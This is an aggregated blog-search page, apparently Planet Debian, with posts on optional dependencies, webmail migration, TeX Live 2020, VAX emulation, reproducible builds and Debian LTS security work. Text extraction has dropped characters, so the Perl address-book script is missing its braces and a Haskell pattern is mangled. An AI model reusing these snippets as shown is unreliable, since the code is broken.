Search Results: "ascii"

12 August 2020

Michael Stapelberg: Optional dependencies don t work

In the i3 projects, we have always tried hard to avoid optional dependencies. There are a number of reasons behind it, and as I have recently encountered some of the downsides of optional dependencies firsthand, I summarized my thoughts in this article.

What is a (compile-time) optional dependency? When building software from source, most programming languages and build systems support conditional compilation: different parts of the source code are compiled based on certain conditions. An optional dependency is conditional compilation hooked up directly to a knob (e.g. command line flag, configuration file, ), with the effect that the software can now be built without an otherwise required dependency. Let s walk through a few issues with optional dependencies.

Inconsistent experience in different environments Software is usually not built by end users, but by packagers, at least when we are talking about Open Source. Hence, end users don t see the knob for the optional dependency, they are just presented with the fait accompli: their version of the software behaves differently than other versions of the same software. Depending on the kind of software, this situation can be made obvious to the user: for example, if the optional dependency is needed to print documents, the program can produce an appropriate error message when the user tries to print a document. Sometimes, this isn t possible: when i3 introduced an optional dependency on cairo and pangocairo, the behavior itself (rendering window titles) worked in all configurations, but non-ASCII characters might break depending on whether i3 was compiled with cairo. For users, it is frustrating to only discover in conversation that a program has a feature that the user is interested in, but it s not available on their computer. For support, this situation can be hard to detect, and even harder to resolve to the user s satisfaction.

Packaging is more complicated Unfortunately, many build systems don t stop the build when optional dependencies are not present. Instead, you sometimes end up with a broken build, or, even worse: with a successful build that does not work correctly at runtime. This means that packagers need to closely examine the build output to know which dependencies to make available. In the best case, there is a summary of available and enabled options, clearly outlining what this build will contain. In the worst case, you need to infer the features from the checks that are done, or work your way through the `--help` output. The better alternative is to configure your build system such that it stops when any dependency was not found, and thereby have packagers acknowledge each optional dependency by explicitly disabling the option.

Untested code paths bit rot Code paths which are not used will inevitably bit rot. If you have optional dependencies, you need to test both the code path without the dependency and the code path with the dependency. It doesn t matter whether the tests are automated or manual, the test matrix must cover both paths. Interestingly enough, this principle seems to apply to all kinds of software projects (but it slows down as change slows down): one might think that important Open Source building blocks should have enough users to cover all sorts of configurations. However, consider this example: building cairo without libxrender results in all GTK application windows, menus, etc. being displayed as empty grey surfaces. Cairo does not fail to build without libxrender, but the code path clearly is broken without libxrender.

Can we do without them? I m not saying optional dependencies should never be used. In fact, for bootstrapping, disabling dependencies can save a lot of work and can sometimes allow breaking circular dependencies. For example, in an early bootstrapping stage, binutils can be compiled with `--disable-nls` to disable internationalization. However, optional dependencies are broken so often that I conclude they are overused. Read on and see for yourself whether you would rather commit to best practices or not introduce an optional dependency.

Best practices If you do decide to make dependencies optional, please:

Set up automated testing for all code path combinations.

Fail the build until packagers explicitly pass a `--disable` flag.

Tell users their version is missing a dependency at runtime, e.g. in `--version`.

23 June 2020

Russell Coker: Squirrelmail vs Roundcube

For some years I ve had SquirrelMail running on one of my servers for the people who like such things. It seems that the upstream support for SquirrelMail has ended (according to the SquirrelMail Wikipedia page there will be no new releases just Subversion updates to fix bugs). One problem with SquirrelMail that seems unlikely to get fixed is the lack of support for base64 encoded From and Subject fields which are becoming increasingly popular nowadays as people who s names don t fit US-ASCII are encoding them in their preferred manner. I ve recently installed Roundcube to provide an alternative. Of course one of the few important users of webmail didn t like it (apparently it doesn t display well on a recent Samsung Galaxy Note), so now I have to support two webmail systems. Below is a little Perl script to convert a SquirrelMail abook file into the csv format used for importing a RoundCube contact list.

#!/usr/bin/perl
print "First Name,Last Name,Display Name,E-mail Address\n";
while(<STDIN>)
 
  chomp;
  my @fields = split(/\ /, $_);
  printf("%s,%s,%s %s,%s\n", $fields[1], $fields[2], $fields[0], $fields[4], $fields[3]);

10 April 2020

Norbert Preining: TeX Live 2020 released

Get the Champagne ready, we have released the final images of TeX Live 2020.

Due to COVID-19, DVD production will be delayed, but we have decided to release the current image and update the net installer. The .iso image is available on CTAN, and the net installer will pull all the newest stuff. Currently we are working on getting those packages updated during the freeze to the newest level in TeX Live. Before providing the full list of changes, here a few things I would like to pick out:

LuaHBTeX: lualatex is now based on LuaHBTeX, meaning that one can use the HarfBuzz renderer which in particular for complicated scripts (Tibetan, Bengali, ) works better than the Lua-based renderer. Note that luatex itself remains normal LuaTeX, only the luaLAtex one uses LuaHBTeX.
Versioned containers: this is a change under the hood we have been working on slowly over the last half year. Many distributions had problems with the changing content of our package containers (foobar.tar.xz while the name never changed. We have now changed all the infrastructure and TeX Live Manager to work with versioned containers foobar.rNNNNN.tar.xz. This should help quite some distributors!
Haranoaji ( ): the default font for Japanese text was for long time the IPAex fonts, one of the few free fonts available. With 2020 we have switched to Haranoaji font family, which provides better support for JIS90/04 charsets, and more weights.

Most of the above features have been available already either via tlpretest or via regular updates, but are now fully released on the DVD version. Thanks goes to all the developers, builders, the great CTAN team, and everyone who has contributed to this release! Finally, here are the changes as listed in the master TeX Live documentation: General:

The \input primitive in all TeX engines, including tex, now also accepts a group-delimited lename argument, as a system-dependent extension. The usage with a standard space/token-delimited lename is completely unchanged. The group-delimited argument was previously implemented in LuaTeX; now it is available in all engines. ASCII double quote characters ( ) are removed from the lename, but it is otherwise left unchanged after tokenization. This does not currently a ect LaTeX s \input command, as that is a macro rede nition of the standard \input primitive.
New option cnf-line for kpsewhich, tex, mf, and all other engines, to support arbitrary con guration settings on the command line.
The addition of various primitives to various engines in this and previous years is intended to result in a common set of functionality available across all engines (LaTeX News #31).

epTeX, eupTeX: New primitives \Uchar, \Ucharcat, \current(x)spacingmode, \ifincsname; revise \fontchar?? and \iffontchar. For eupTeX only: \currentcjktoken. LuaTeX: Integration with HarfBuzz library, available as new engines luahbtex (used for lualatex) and luajithbtex. New primitives: \eTeXgluestretchorder, \eTeXglueshrinkorder. pdfTeX: New primitive \pdfmajorversion; this merely changes the version number in the PDF output; it has no e ect on any PDF content. \pdfximage and similar now search for image les in the same way as \openin. pTeX: New primitives \ifjfont, \iftfont. Also in epTeX, upTeX, eupTeX. XeTeX: Fixes for \Umathchardef, \XeTeXinterchartoks, \pdfsavepos. Dvips: Output encodings for bitmap fonts, for better copy/paste capabilities (https://tug.org/TUGboat/tb40-2/tb125rokicki-type3search.pdf). MacTeX: MacTeX and x86_64-darwin now require 10.13 or higher (High Sierra, Mojave, and Catalina); x86_64-darwinlegacy supports 10.6 and newer. MacTeX is notarized and command line programs have hardened runtimes, as now required by Apple for install packages. BibDesk and TeX Live Utility are not in MacTeX because they are not notarized, but a README le lists urls where they can be obtained. tlmgr and infrastructure:

Automatically retry (once) packages that fail to download.
New option tlmgr check texmfdbs, to to check consistency of ls-R les and !! speci cations for each tree.
Use versioned lenames for the package containers, as in tlnet/archive/pkgname.rNNN.tar.xz; should be invisible to users, but a notable change in distribution.
catalogue-date information no longer propagated from the TeX Catalogue, since it was often unrelated to package updates.

22 March 2020

Emmanuel Kasper: Big Iron UNIX emulated on ARM

I have somewhere in the basement a DEC Vax workstation, but in the end it was a bigger fun to run an emulated Vax 11/780 (size of two refrigerators) in Beagle Bone Black (size of a big matchbox). For this I used the Dockerfiles available in this git repo using the simh emulator, and tweaked a bit for ARM.
I recorded the boot sequence with the very nice asciinema, also available in the Debian archive, so here is 4.3 BSD, in all its 1986 glory.

7 November 2017

Reproducible builds folks: Reproducible Builds: Weekly report #132

Here's what happened in the Reproducible Builds effort between Sunday October 29 and Saturday November 4 2017: Past events

From October 31st November 2nd we held the 3rd Reproducible Builds summit in Berlin, Germany. A full, in-depth report will be posted in the next week or so.

Upcoming events

On November 8th Jonathan Bustillos Osornio (jathan) will present at CubaConf Havana.
On November 17th Chris Lamb will present at Open Compliance Summit, Yokohama, Japan on how reproducible builds ensures the long-term sustainability of technology infrastructure.

Reproducible work in other projects

Alan Pope linked to the status of "asset recording" in SnapCraft, a concept related to .buildinfo files.

Packages reviewed and fixed, and bugs filed

Chris Lamb:
- #880714 filed against cappuccino.
- #880803 filed against python-kafka.
- #880804 filed against debci.
- #880827 filed against roundcube.
Steve Langasek:
- #880550 filed against g2.
Juro:
- curl (SOURCE_DATE_EPOCH)
- OpenSSL (SOURCE_DATE_EPOCH)
Bernhard M. Wiedemann:
- openSUSE/ant (use SOURCE_DATE_EPOCH)
- openSUSE/mariadb (drop INFO_BIN)
- openSUSE/libsmbios (drop embedded build log)

Reviews of unreproducible packages 7 package reviews have been added, 43 have been updated and 47 have been removed in this week, adding to our knowledge about identified issues. Weekly QA work During our reproducibility testing, FTBFS bugs have been detected and reported by:

Adrian Bunk (44)
Andreas Moog (1)
Lucas Nussbaum (7)
Steve Langasek (1)

Documentation updates

Ulrike Uhlig:
- Add documentation about system images.
Holger Levsen:
- List all speakers of the DebConf17
- Add news about the Berlin event
Chris Lamb:
Bernhard M. Wiedemann:
- Fix openSUSE website link

diffoscope development Version 88 was uploaded to unstable by Mattia Rizzolo. It included contributions (already covered by posts of the previous weeks) from:

Mattia Rizzolo
- tests/comparators/dtb: compatibility with version 1.4.5. (Closes: #880279)
Chris Lamb
- comparators:
  - binwalk: improve names in output of "internal" members. #877525
  - Omit misleading "any of" prefix when only complaining about one module in ImportError messages.
- Don't crash on malformed "md5sums" files. (Closes: #877473)
- tests/comparators:
  - ps: ps2ascii > 9.21 now varies on timezone, so skip this test for now.
  - dtby: only parse the version number, not any "-dirty" suffix.
- debian/watch: Use HTTPS URI.
Ximin Luo
- comparators:
  - utils/file: Diff container metadata centrally. This fixes a last remaining bug in fuzzy-matching across containers. (Closes: #797759)
  - Fix all the affected comparators after the above change.
Holger Levsen
- Bump Standards-Version to 4.1.1, no changes needed.

strip-nondeterminism development Version 0.040-1 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks, as well as new ones from:

Mattia Rizzolo:
- Declare that strip-nondeterminism doesn't need root to build
- Add my key to debian/upstream/signing-key.asc m disorderfs development

Version 0.5.2-2 was uploaded to unstable by Holger Levsen. It included contributions already covered by posts of the previous weeks, as well as new ones from:

reprotest development

Ximin Luo:
- Mention certificate expiry errors in documentation as a potential issue with faketime

buildinfo.debian.net development

Chris Lamb:
- Support UID filtering
- Add initial "by-hash" API endpoint.

tests.reproducible-builds.org

Mattia Rizzolo:
- archlinux: enable schroot building on pb4 as well
- archlinux: don't install the deprecated abs tool
- archlinux: try to re-enable one schroot creation job
lynxis
- lede: replace TMPDIR -> RESULTSDIR
- lede: openwrt_get_banner(): use locals instead of globals
- lede: add newline to $CONFIG
- lede: show git log -1 in jenkins log
Holger Levsen:
- lede: add very simple landing page
Juliana Oliveira Rodrigues
- archlinux: adds pacman-git dependencies
kpcyrd
- archlinux: disable signature verification when running in the future
- archlinux: use pacman-git until the next release
- archlinux: make pacman fail less early
- archlinux: use sudo to prepare chroot
- archlinux: remove -rf for regular file
- archlinux: avoid possible TOCTOU issue
- archlinux: Try to fix tar extraction
- archlinux: fix sha1sums parsing

Misc. This week's edition was written by Bernhard M. Wiedemann, Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

2 November 2017

Antoine Beaupr : October 2017 report: LTS, feed2exec beta, pandoc filters, git mediawiki

Debian Long Term Support (LTS) This is my monthly Debian LTS report. This time I worked on the famous KRACK attack, git-annex, golang and the continuous stream of GraphicsMagick security issues.

WPA & KRACK update I spent most of my time this month on the Linux WPA code, to backport it to the old (~2012) `wpa_supplicant` release. I first published a patchset based on the patches shipped after the embargo for the oldstable/jessie release. After feedback from the list, I also built packages for i386 and ARM. I have also reviewed the WPA protocol to make sure I understood the implications of the changes required to backport the patches. For example, I removed the patches touching the WNM sleep mode code as that was introduced only in the 2.0 release. Chunks of code regarding state tracking were also not backported as they are part of the state tracking code introduced later, in 3ff3323. Finally, I still have concerns about the nonce setup in patch #5. In the last chunk, you'll notice `peer->tk` is reset, to_set to negotiate a new `TK`. The other approach I considered was to backport 1380fcbd9f ("TDLS: Do not modify RNonce for an TPK M1 frame with same INonce") but I figured I would play it safe and not introduce further variations. I should note that I share Matthew Green's observations regarding the opacity of the protocol. Normally, network protocols are freely available and security researchers like me can easily review them. In this case, I would have needed to read the opaque 802.11i-2004 pdf which is behind a TOS wall at the IEEE. I ended up reading up on the IEEE_802.11i-2004 Wikipedia article which gives a simpler view of the protocol. But it's a real problem to see such critical protocols developed behind closed doors like this. At Guido's suggestion, I sent the final patch upstream explaining the concerns I had with the patch. I have not, at the time of writing, received any response from upstream about this, unfortunately. I uploaded the fixed packages as DLA 1150-1 on October 31st.

Git-annex The next big chunk on my list was completing the work on git-annex (CVE-2017-12976) that I started in August. It turns out doing the backport was simpler than I expected, even with my rusty experience with Haskell. Type-checking really helps in doing the right thing, especially considering how Joey Hess implemented the fix: by introducing a new type. So I backported the patch from upstream and notified the security team that the jessie and stretch updates would be similarly easy. I shipped the backport to LTS as DLA-1144-1. I also shared the updated packages for jessie (which required a similar backport) and stretch (which didn't) and those Sebastien Delafond published those as DSA 4010-1.

Graphicsmagick Up next was yet another security vulnerability in the Graphicsmagick stack. This involved the usual deep dive into intricate and sometimes just unreasonable C code to try and fit a round tree in a square sinkhole. I'm always unsure about those patches, but the test suite passes, smoke tests show the vulnerability as fixed, and that's pretty much as good as it gets. The announcement (DLA 1154-1) turned out to be a little special because I had previously noticed that the penultimate announcement (DLA 1130-1) was never sent out. So I made a merged announcement to cover both instead of re-sending the original 3 weeks late, which may have been confusing for our users.

Triage & misc We always do a bit of triage even when not on frontdesk duty, so I:

sent another ping to the ca-certificates maintainer

triaged Puppet's CVE-2016-5714 out of wheezy and other suites, after a thorough analysis of the what has become the intricate numbering scheme for Puppet suites

triaged ImageMagick as not affecting in wheezy and jessie, but it turned out the latter was a little too enthusiastic as the team wanted to wait for upstream confirmation before skipping jessie

did some research on tiff's CVE-2017-11613 (skipped by RHEL) and CVE-2017-9935 (no fix upstream)

I also did smaller bits of work on:

worked on a patch to add a `dch --lts` flag in Debian bug #762715 which is currently pending review

golang's CVE-2017-15041 which I originally triaged out but then changed my mind as the patch was small and the impact was large. This turned into DLA-1148-1.

The latter reminded me of the concerns I have about the long-term maintainability of the golang ecosystem: because everything is statically linked, an update to a core library (say the SMTP library as in CVE-2017-15042, thankfully not affecting LTS) requires a full rebuild of all packages including the library in all distributions. So what would be a simple update in a shared library system could mean an explosion of work on statically linked infrastructures. This is a lot of work which can definitely be error-prone: as I've seen in other updates, some packages (for example the Ruby interpreter) just bit-rot on their own and eventually fail to build from source. We would also have to investigate all packages to see which one include the library, something which we are not well equipped for at this point. Wheezy was the first release shipping golang packages but at least it's shipping only one... Stretch has shipped with two golang versions (1.7 and 1.8) which will make maintenance ever harder in the long term.
We build our computers the way we build our cities--over time, without a plan, on top of ruins. - Ellen Ullman

Other free software work This month again, I was busy doing some serious yak shaving operations all over the internet, on top of publishing two of my largest LWN articles to date (2017-10-16-strategies-offline-pgp-key-storage and 2017-10-26-comparison-cryptographic-keycards).

feed2exec beta Since I announced this new project last month I have released it as a beta and it entered Debian. I have also wrote useful plugins like the `wayback` plugin that saves pages on the Wayback machine for eternal archival. The `archive` plugin can also similarly save pages to the local filesystem. I also added bash completion, expanded unit tests and documentation, fixed default file paths and a bunch of bugs, and refactored the code. Finally, I also started using two external Python libraries instead of rolling my own code: the pyxdg and requests-file libraries, the latter which I packaged in Debian (and fixed a bug in their test suite). The program is working pretty well for me. The only thing I feel is really missing now is a retry/fail mechanism. Right now, it's a little brittle: any network hiccup will yield an error email, which are readable to me but could be confusing to a new user. Strangely enough, I am particularly having trouble with (local!) DNS resolution that I need to look into, but that is probably unrelated with the software itself. Thankfully, the user can disable those with `--loglevel=ERROR` to silence `WARNING`s. Furthermore, some plugins still have some rough edges. For example, The Transmission integration would probably work better as a distinct plugin instead of a simple `exec` call, because when it adds new torrents, the output is totally cryptic. That plugin could also leverage more feed parameters to save different files in different locations depending on the feed titles, something would be hard to do safely with the `exec` plugin now. I am keeping a steady flow of releases. I wish there was a way to see how effective I am at reaching out with this project, but unfortunately GitLab doesn't provide usage statistics... And I have received only a few comments on IRC about the project, so maybe I need to reach out more like it says in the fine manual. Always feels strange to have to promote your project like it's some new bubbly soap... Next steps for the project is a final review of the API and release production-ready 1.0.0. I am also thinking of making a small screencast to show the basic capabilities of the software, maybe with asciinema's upcoming audio support?

Pandoc filters As I mentioned earlier, I dove again in Haskell programming when working on the git-annex security update. But I also have a small Haskell program of my own - a Pandoc filter that I use to convert the HTML articles I publish on LWN.net into a Ikiwiki-compatible markdown version. It turns out the script was still missing a bunch of stuff: image sizes, proper table formatting, etc. I also worked hard on automating more bits of the publishing workflow by extracting the time from the article which allowed me to simply extract the full article into an almost final copy just by specifying the article ID. The only thing left is to add tags, and the article is complete. In the process, I learned about new weird Haskell constructs. Take this code, for example:

-- remove needless blockquote wrapper around some tables
--
-- haskell newbie tips:
--
-- @ is the "at-pattern", allows us to define both a name for the
-- construct and inspect the contents as once
--
--   is the "empty record pattern": it basically means "match the
-- arguments but ignore the args"
cleanBlock (BlockQuote t@[Table  ]) = t

Here the idea is to remove <blockquote> elements needlessly wrapping a <table>. I can't specify the Table type on its own, because then I couldn't address the table as a whole, only its parts. I could reconstruct the whole table bits by bits, but it wasn't as clean. The other pattern was how to, at last, address multiple string elements, which was difficult because Pandoc treats spaces specially:

cleanBlock (Plain (Strong (Str "Notifications":Space:Str "for":Space:Str "all":Space:Str "responses":_):_)) = []

The last bit that drove me crazy was the date parsing:

-- the "GAByline" div has a date, use it to generate the ikiwiki dates
--
-- this is distinct from cleanBlock because we do not want to have to
-- deal with time there: it is only here we need it, and we need to
-- pass it in here because we do not want to mess with IO (time is I/O
-- in haskell) all across the function hierarchy
cleanDates :: ZonedTime -> Block -> [Block]
-- this mouthful is just the way the data comes in from
-- LWN/Pandoc. there could be a cleaner way to represent this,
-- possibly with a record, but this is complicated and obscure enough.
cleanDates time (Div (_, [cls], _)
                 [Para [Str month, Space, Str day, Space, Str year], Para _])
    cls == "GAByline" = ikiwikiRawInline (ikiwikiMetaField "date"
                                           (iso8601Format (parseTimeOrError True defaultTimeLocale "%Y-%B-%e,"
                                                           (year ++ "-" ++ month ++ "-" ++ day) :: ZonedTime)))
                        ++ ikiwikiRawInline (ikiwikiMetaField "updated"
                                             (iso8601Format time))
                        ++ [Para []]
-- other elements just pass through
cleanDates time x = [x]

Now that seems just dirty, but it was even worse before. One thing I find difficult in adapting to coding in Haskell is that you need to take the habit of writing smaller functions. The language is really not well adapted to long discourse: it's more about getting small things connected together. Other languages (e.g. Python) discourage this because there's some overhead in calling functions (10 nanoseconds in my tests, but still), whereas functions are a fundamental and important construction in Haskell that are much more heavily optimized. So I constantly need to remind myself to split things up early, otherwise I can't do anything in Haskell. Other languages are more lenient, which does mean my code can be more dirty, but I feel get things done faster then. The oddity of Haskell makes frustrating to work with. It's like doing construction work but you're not allowed to get the floor dirty. When I build stuff, I don't mind things being dirty: I can cleanup afterwards. This is especially critical when you don't actually know how to make things clean in the first place, as Haskell will simply not let you do that at all. And obviously, I fought with Monads, or, more specifically, "I/O" or IO in this case. Turns out that getting the current time is IO in Haskell: indeed, it's not a "pure" function that will always return the same thing. But this means that I would have had to change the signature of all the functions that touched time to include IO. I eventually moved the time initialization up into main so that I had only one IO function and moved that timestamp downwards as simple argument. That way I could keep the rest of the code clean, which seems to be an acceptable pattern. I would of course be happy to get feedback from my Haskell readers (if any) to see how to improve that code. I am always eager to learn.

Git remote MediaWiki Few people know that there is a MediaWiki remote for Git which allow you to mirror a MediaWiki site as a Git repository. As a disaster recovery mechanism, I have been keeping such a historical backup of the Amateur radio wiki for a while now. This originally started as a homegrown Python script to also convert the contents in Markdown. My theory then was to see if we could switch from Mediawiki to Ikiwiki, but it took so long to implement that I never completed the work. When someone had the weird idea of renaming a page to some impossible long name on the wiki, my script broke. I tried to look at fixing it and then remember I also had a mirror running using the Git remote. It turns out it also broke on the same issue and that got me looking in the remote again. I got lost in a zillion issues, including fixing that specific issue, but I especially looked at the possibility of fetching all namespaces because I realized that the remote fetches only a part of the wiki by default. And that drove me to submit namespace support as a patch to the git mailing list. Finally, the discussion came back to how to actually maintain that contrib: in git core or outside? Finally, it looks like I'll be doing some maintenance that project outside of git, as I was granted access to the GitHub organisation...

Galore Yak Shaving Then there's the usual hodgepodge of fixes and random things I did over the month.

Beta testing for the new Signal desktop app which is, unfortunately, an Electron app. This means the binary is huge, at 95MB, and the app takes a whopping 300MB of ram right after startup. Compare this with my IRC client (irssi) which takes 15MB of ram or pidgin, which takes 80MB of ram. Then ponder the costs of developer convenience versus impact on the environment and users...

Routine linkchecker maintenance: 3 PRs merged including a bugfix of my own, one of which inspired me to add the pyxdg dependency in feed2exec.

When adding "badges" to the feed2exec documentation, I also fixed an issue in badges.debian.net, where Debian was referring to wheezy instead of the symbolic name

Tested the Wireguard VPN with moderate success. It can only cross NAT one way, so it was useless for my use case. I ended up using end to end IPv6! still, I updated the Turris OS Wireguard version so that I could use this as a way to get end to end IPv4 connectivity to machines behind my NAT.

Tested a static image gallery generator replacement called Sigal. I suggested a way to add progress information for video processing and did a general issue review. I also looked at how to package it in Debian, in RFP #879239. I looked into Sigal after finally getting a confirmation from the Photofloat maintainer (Jason A. Donenfeld, who's also the Wireguard author) that our patches will never get merged, after 3 years of radio silence. In comparison, the response I got from the communications with Sigal were much more positive. I have therefore requested removal of photofloat from Debian

More on ham radio stuff: I got a Signalink working, which allowed me to receive and transmit APRS signals using a handheld transmitter

I worked more on SafeEyes to try and get it to credit me idle time, which is still not working yet, and suggested improvements to the preferences panel

I found out about the Chrome Lighthouse web page auditor, which doesn't seem to work at all in Chromium, but has a lot of potential. there's a standalone version as well, which could be packaged for Debian, but found that #775925 is for a different lighthouse - a dead Bitcoin-based crowdfunding platform

I helped Koumbit.org configure load balancing for their HTTPS services. For this, I needed to change my IP address, so I test again the Bitmask client and found problems with polkit and the password failure prompt. I also suggested improvements the kerying package.

After realizing there was no future in the It's all text! (IAT) extension, I have switched to Ghosttext which works both in Chromium and Firefox and uses a model similar to the Edit in Emacs extension for Chrome, but it also supports Firefox and other editors. I have filed an issue about silent failures with uMatrix and generally tried to help the IAT community find an exit strategy. (Short story: it's impossible to port, and XUL will die a horrible death.)

There is no [web extension] only XUL! - Inside joke

31 October 2017

Chris Lamb: Free software activities in October 2017

Here is my monthly update covering what I have been doing in the free software world in October 2017 (previous month):

Wrote and released python-gfshare, a Python library that implements Shamir s method for secret sharing, a cryptography technique to split a file into multiple parts. I blogged about it earlier in the month.
Improved the new-style URL handling in the 2.x branch of the Django web framework to check for incorrectly migrated calls from the old system. [...]
Added support for Python 3, Django 1.9 & Django 2.0 to django-auto-one-one-to-one, my library to cleanly manage related model instances.
Proposed two small pull requests for Redisearch, a search engine module for the Redis key-value storage database:
- Don't assume that not being Linux is OSX. [...]
- Install the module into /usr/lib over /var/lib as the latter is for program state, not libraries or modules. [...]
In Peter Bengtsson's new django-cache-memoize library, suggested an addition to the store_result documentation. [...]
Made two pull requests for django-auditlog, a Django app that maintains an audit trail of changes in your application:
- Add missing on_delete to the LogEntry initial migration to ensure compatibility with Django 2.x. [...]
- Add missing python-dateutil to setup.py. [...]
Yet more Lintian hacking (previously):
- New features:
  - Warn when packages unnecessararily set dpkg-architecture(1) variables. (#793554)
  - Check for files that use content from the /etc/init.d/skeleton template. (#879152)
  - Warn about certain files under debian/* that contain trailing whitespace characters. (#748405)
  - Ignore embedded jQuery libraries for Doxygen. (#736360)
  - Warn about Django libraries that do not depend on Django itself. (#877292)
  - Check for Python modules with overly generic names such as tests or test. (#875964)
  - Warn if packages set CFLAGS if the value of DEB_BUILD_OPTIONS contains noopt. (#718640)
  - Ignore embedded jQuery libraries for Doxygen. (#736360)
  - Warn about empty fields in debian/control. (#744388)
  - Add bionic as known Ubuntu distribution. (#880115)
  - Warn if native systemd .service files only wrap the existing SysV/LSB init scripts. (#870704)
  - Emit new empty-section-field tag instead of uninitialized value warnings on an empty Section: field. (#878515)
  - Warn about debian/watch files using insecure URIs, similar to vcs-field-uses-insecure-uri. (#849515)
  - Include the offending URI in debian-watch-uses-insecure-uri output, not the line number.
  - Allow empty md5sums files. (#781372)
  - Move latest-debian-changelog-entry-without-new-date tag into a new check of type source. (#873612)
  - Add cwl-runner to the list of known interpreters. (#851126)
  - Also match packages named python2-* as relating to the Python 2.x migration.
- Bug fixes:
  - Don't error out when AppStream metadata is invalid; emit appstream-metadata-invalid instead. (#879661)
  - Actually check for a dependency on sensible-utils before emitting script-needs-depends-on-sensible-utils. (#877439)
  - Avoid a false positives in debian-control-has-empty-field when the field is wrapped onto a new line. (#879977)
  - Drop README.source from files to check against file-contains-trailing-whitespace as it can include literal quotes from upstreams that would be ideally left intact.
  - Lower the severity of package-installs-java-bytecode from E: to W:. (#879862)
  - Do not trigger package-installs-java-bytecode if the path contains WEB-INF, demo, doc etc. (#879860)
  - Verify files triggering package-installs-java-bytecode files really are Java .class files. (#879861)
  - Check the Recommends field as well when testing scripts for script-needs-depends-on-sensible-utils. (#879953)
  - Ignore the "magic" http://sf.net/ redirector URI for the debian-watch-uses-insecure-uri tag. (#879206)
  - Revert addition of "none were" -> "none was" multiword spelling correction as it is "acceptable beyond serious criticism". (#878457)
  - Drop copyright-year-in-future; too error prone and time-consuming to maintain given the severity of the issues it can find. (#877766)
  - Exempt debian/copyright from the license-problem-non-free-RFC tag to avoid false-positives "meta" references. (#877999)
  - Ignore privacy breach violations within HTML/Javascript comments. (#877421)
  - Avoid warning for init.d-script-not-marked-as-conffile when the init.d script does not exist as we will already be alerted via the init.d-script-not-included-in-package tag.
  - Do not emit python-foo-but-no-python3-foo for packages ending with -common.
  - Add missing example-script-uses-deprecated-nodejs-location tag. (#877142)
  - Correct invalid link to upgrading-checklist in Standards-Version checks. (#878184)
- Documentation:
  - Add a note to orig-tarball-missing-upstream-signature regarding support in pristine-tar and git-buildpackage.
  - Add example on how to remove trailing whitespace with sed.
- Tests:
  - Split out checks for debconf-config-not-executable into a separate test protected by a Test-Requires now that dpkg 1.19.0 will bail out on that condition.
  - Correct Depends of python2.7 python3 in a Python 3 test package.
  - Add test for ignoring python-foo-doc packages for the Python 3 migration and correct short descriptions of test packages.
Finally, I was interviewed by HostingAdvice about my role as Debian Project Leader.

Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws, most software is distributed pre-compiled to end users. The motivation behind the Reproducible Builds effort is to allow verification that no flaws have been introduced either maliciously or accidentally during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised. I have generously been awarded a grant from the Core Infrastructure Initiative to fund my work in this area. This month I:

Presented at All Things Open, 2017 in Raleigh, NC, United States.
Attended the third Reproducible Builds summit in Berlin, Germany.
Presented at the inaugural Freenode #live conference in Bristol, United Kingdom.
In Debian, I:
- Kept isdebianreproducibleyet.com up to date.
- Submitted 10 patches to fix specific reproducibility issues in argagg, cadvisor, fmtlib, geographiclib, live-build, plr, polygen, python-amqp, rcs & sdlgfx.
- Made the following non-maintainer uploads (NMUs) to Debian to fix reproducibility issues:
  - gerstensaft 0.3-4.1 (#777414)
  - ipsvd 1.0.0-3.1 (#777417, #846890)
  - mailfront 1.16-1.1 (#777431, #847020)
  - miniupnpd 1.8.20140523-4.2 (#860266)
  - plib-doc 1:1.8.5-3.1 (#778971, #557676)
  - rest2web 0.5.2~alpha+svn-r248-2.3 (#833438)
Updated the try.diffoscope.org SSL key.
Categorised a large number of packages and issues in the Reproducible Builds "notes" repository.
Worked on publishing our weekly reports. (#128, #129, #130 & #131)

I also made the following changes to our tooling:

diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues.

Improve names in output of "internal" binwalk members. (#877525).
Don't crash on malformed md5sums files. (#877473).
Omit misleading "any of" prefix when only complaining about a single module on import. [...]
Adjust tests as ps2ascii now varies its output on timezone. [...]

strip-nondeterminism

strip-nondeterminism is our tool to remove specific non-deterministic results from a completed build.

Clojure considers .class file to be stale if it shares the same timestamp of the .clj. We thus adjust the timestamps of the .clj to always be younger. (#877418).
Print a message in --verbose mode if no canonical time was specified. [...]

buildinfo.debian.net

buildinfo.debian.net is my experiment into how to process, store and distribute .buildinfo files after the Debian archive software has processed them.

Always show SHA-256 checksums, regardless of the browser viewport size. [...]
Add an API endpoint to fetch specific .buildinfo files for a certain package/version/architecture. [...]

Debian My activities as the current Debian Project Leader are covered in my "Bits from the DPL" email to the debian-devel-announce mailing list.

Patches contributed

devscripts: Please print the actual arguments debuild makes to Lintian. (#880124)
hw-detect: Drop reference to floppy disks; it's almost 2018. (#880122)
debci:
- Use deb.debian.org over http.debian.net. (#879654)
- Document how to use an alternative mirror. (#879655)

Debian LTS

This month I have been paid to work 18 hours on Debian Long Term Support (LTS). In that time I did the following:

"Frontdesk" duties, triaging CVEs, etc.
Followed up on a large number of upstream "pings" that have been left dormant.
Issued DLA 1121-1 to fix an out-of-bounds read vulnerability in curl where a malicious FTP server could abuse this to prevent clients from interacting with it.
Issued DLA 1123-1 for the "Go" programming language where an attacker could generate a MIME request such that the server ran out of file descriptors.
Issued DLA 1126-1 for the libxfont font selection and rasterisation library, correcting two vulnerabilities, both involving the library being tricked into reading invalid/random memory.
Issued DLA 1134-1 for sdl-image1.2, an image loading library. A maliciously-crafted .xcf file could cause a stack-based buffer overflow resulting in potential code execution.

Uploads

python-django:
- 2.0~beta1-1 New upstream 2.x release.
- 1.11.6-1 New upstream bugfix release.
gunicorn (19.6.0-10+deb9u1) Prepared a release for stable to avoid a runtime dependency on a compiler. (#877722)
redis:
- 4:4.0.2-3:
  - Drop the Debian-specific /etc/redis/redis-server.pre-up.d (etc.) hooks and remove them if unchanged.
  - Include systemd redis-server@.service and redis-sentinel@.service template files to easily run multiple Redis instances. (#877702)
  - Patch redis.conf and sentinel.conf with quilt instead of maintaining our own versions under debian/.
- 4:4.0.2-4:
  - Add input validity checking to cluster config slot numbers to fix CVE-2017-15047. (#878076)
  - Drop debian/bin/generate-parts now we aren't calling it.
  - Correct Bash-ism in NEWS file.
